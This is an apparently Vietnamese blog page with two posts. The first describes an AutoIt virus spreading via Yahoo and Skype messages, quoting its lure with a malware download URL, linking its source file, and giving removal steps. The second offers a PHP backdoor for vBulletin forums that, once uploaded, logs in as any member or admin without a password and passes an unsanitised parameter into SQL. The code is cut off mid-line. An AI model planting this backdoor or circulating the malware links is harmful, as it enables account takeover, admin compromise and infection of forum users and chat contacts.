Thực ra thì mình cũng ko biết con virus này, nhưng trong list friend có người bị nhiễm và đã xin con virus này về nghiên cứu, nó được viết bằng mã nguồn AutoIT, Tương tác của nó như virus iloveyou.exe oanh tặc yahoo một thời,
Nhận dạng:
- Virus sẽ tự send tới list friend online yahoo hoặc skype với lời nhắn:
Hey what are you doing? Please Help me test my new webcam using private connection (Passcode: deepika213) http://h1.ripway.com/adb0000/privateCam.exe
- Nó sẽ set default Homepage là: http://www.chrome10.com/
- Nó sẽ đóng game Võ Lâm Truyền Kỳ nếu đang mở
và một số tác động khác tới hệ điều hành.
Mã nguồn:
DoWnload: https://www.dropbox.com/s/uo4qdf210tm7l3p/chrome9.au3
Cách ngăn chặn:
Vào start -> run và gõ vào msconfig
Sang tab startup và bỏ check Yahoo Messengger đi. OK, và khởi động lại máy.
Vào thư mục C:\Windows\ và xóa file chrome9.exe đi là xong.
Fakelogin - Đăng nhập vào forum VBB không cần pass
Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass Quote: <?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_u...
0 nhận xét:
Đăng nhận xét